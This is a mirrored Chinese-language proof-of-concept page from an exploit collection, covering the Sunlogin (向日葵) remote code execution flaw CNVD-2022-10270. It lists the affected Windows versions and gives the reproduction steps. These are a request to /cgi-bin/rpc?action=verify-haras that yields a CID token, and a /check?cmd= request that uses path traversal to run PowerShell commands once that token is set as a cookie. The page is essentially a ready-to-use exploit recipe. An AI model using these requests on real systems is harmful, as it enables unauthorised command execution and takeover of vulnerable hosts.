mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-08 03:46:17 +00:00
34 lines
1.2 KiB
Markdown
34 lines
1.2 KiB
Markdown
# 向日葵远程代码执行漏洞(CNVD-2022-10270)
|
||
|
||
## 漏洞描述
|
||
向日葵通过发送特定的请求获取CID后,可调用 check接口实现远程命令执行,导致服务器权限被获取。
|
||
|
||
## 影响版本
|
||
+ 向日葵个人版 for Windows <=11.0.0.33162版本
|
||
+ 向日葵简约版 <= V1.0.1.43315(2021.12)
|
||
|
||
## 漏洞复现
|
||
向日葵开启后会默认在`4000-65535`之间开启某个端口
|
||
|
||

|
||
|
||
发送请求获取CID
|
||
|
||
```java
|
||
/cgi-bin/rpc?action=verify-haras
|
||
```
|
||
|
||

|
||
|
||
使用获取到的 verify_string 作为 cookie的 CID字段,进行命令执行
|
||
|
||
```java
|
||
/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
|
||
```
|
||
|
||

|
||
|
||
|
||
|
||
> 更新: 2024-02-29 23:58:31
|
||
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/re22tknn48ckod6v> |